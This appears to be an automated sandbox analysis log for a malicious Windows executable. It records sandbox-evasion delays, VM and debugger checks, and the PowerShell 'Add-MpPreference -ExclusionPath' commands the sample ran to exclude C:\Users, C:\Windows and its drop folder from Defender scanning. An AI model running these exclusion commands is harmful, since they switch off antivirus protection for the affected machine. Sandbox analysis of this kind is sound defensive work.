Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -98265s >= -30000s
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -98155s >= -30000s
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -98047s >= -30000s
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -97937s >= -30000s
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -97828s >= -30000s
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -97719s >= -30000s
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -97609s >= -30000s
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -97497s >= -30000s
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -97390s >= -30000s
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -97281s >= -30000s
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -97172s >= -30000s
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -97062s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -96953s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -96844s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -96719s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -96609s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -96500s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -96390s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -96281s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -96172s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -96062s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -95953s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -95844s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -95719s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -95609s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -95500s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -95390s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -95281s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -95172s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -95062s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -94953s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -94843s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -94734s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -94624s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -94515s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5960 Thread sleep count: 1068 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3364 Thread sleep count: 42 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4832 Thread sleep count: 458 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2328 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6720 Thread sleep count: 7498 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7116 Thread sleep count: 2182 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3672 Thread sleep time: -2767011611056431s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5296 Thread sleep count: 1553 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5940 Thread sleep count: 265 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 828 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3500 Thread sleep count: 6815 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3836 Thread sleep time: -4611686018427385s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4820 Thread sleep count: 2907 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6012 Thread sleep count: 1346 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6012 Thread sleep count: 615 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4536 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2068 Thread sleep count: 7908 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2068 Thread sleep count: 1753 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5184 Thread sleep time: -2767011611056431s >= -30000s Jump to behavior
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0041E359 FindFirstFileA,FindFirstFileA, 14_2_0041E359
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_00420370 FindFirstFileA,FindFirstFileA, 14_2_00420370
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0042498B FindFirstFileA,FindFirstFileA, 14_2_0042498B
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 100000
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 99812
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 99687
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 99578
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 99469
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 99359
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 99249
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 99140
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 99031
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 98922
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 98812
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 98703
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 98593
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 98484
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 98375
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 98265
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 98155
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 98047
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 97937
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 97828
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 97719
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 97609
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 97497
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 97390
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 97281
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 97172
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 97062
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 96953
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 96844
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 96719
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 96609
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 96500
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 96390
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 96281
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 96172
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 96062
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 95953
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 95844
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 95719
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 95609
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 95500
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 95390
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 95281
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 95172
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 95062
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 94953
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 94843
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 94734
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 94624
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 94515
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: YYjRtxS70h.exe, 00000000.00000002.1785844596.0000000000C59000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.000000000066A000.00000004.00000001.01000000.00000008.sdmp Binary or memory string: VMwareVMware
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A31000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.00000000009CE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWP[
Source: YYjRtxS70h.exe, 00000000.00000002.1799387443.000000000657B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: YYjRtxS70h.exe, 00000000.00000002.1785844596.0000000000C06000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040168C mov eax, dword ptr fs:[00000030h] 14_2_0040168C
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_004016AA test dword ptr fs:[00000030h], 00000068h 14_2_004016AA
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_004016BB mov eax, dword ptr fs:[00000030h] 14_2_004016BB
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\YYjRtxS70h.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\VmTatwGQo'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\VmTatwGQo
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Users
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Windows
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\VmTatwGQo'"
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\VmTatwGQo
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Users
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Windows
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\VmTatwGQo'"
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Process created: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe "C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\VmTatwGQo
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Users
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Windows
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Queries volume information: C:\Users\user\Desktop\YYjRtxS70h.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
